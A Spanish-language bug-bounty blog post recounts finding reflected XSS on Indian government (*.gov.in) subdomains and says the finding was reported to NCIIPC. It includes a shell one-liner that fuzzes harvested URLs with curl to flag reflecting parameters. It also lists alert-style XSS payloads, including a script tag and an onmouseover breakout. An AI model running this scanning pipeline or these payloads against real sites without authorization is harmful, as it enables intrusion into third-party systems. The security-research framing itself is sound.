Cómo encontré Reflected XSS en *.GOV.IN

May 02 2023
Este blog te ayudará a encontrar todos los parámetros vulnerables en cualquier aplicación web. También le enseñará cómo explotar vulnerabilidades como XSS y SQLI al acercarse a cualquier sitio web.

Este blog te ayudará a encontrar todos los parámetros vulnerables en cualquier aplicación web. También le enseñará cómo explotar vulnerabilidades como XSS y SQLI al acercarse a cualquier sitio web.

Qué es XSS reflejado:

El cross-site scripting reflejado (o XSS) es una vulnerabilidad de seguridad que ocurre cuando una aplicación recibe datos en una solicitud HTTP y los almacena dentro de la respuesta sin filtrarlos ni desinfectarlos adecuadamente.

Avancemos paso a paso:

Seleccione el dominio: *.gov.in

Paso 1: encuentre todos los subdominios posibles en el dominio seleccionado

Paso 2: Seleccione cualquier subdominio

Paso 3: descubra todos los parámetros posibles usando una herramienta como Paramspider

Paso 4: Examine todas las URL que reflejen directamente caracteres especiales.

Para automatizar, use el siguiente script:

cat urls.txt| egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host  \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt

      
                

Paso 5: Pruébelo manualmente ahora:

Probemos la carga útil XSS básica:

"><script>alert(1);</script>

Introducir carga útil

Sin ventanas emergentes:

Vamos a empezar desde el principio:

Prueba con: comillas simples

'

      
                
No Errors

Ahora prueba con algunos eventos:

' onmouseover=alert(1);>

      
                

Veamos el código fuente:

Obtuvimos XSS, ahora informe a NCIIPC

Contacto:

https://www.linkedin.com/in/prince-prafull-19a477194/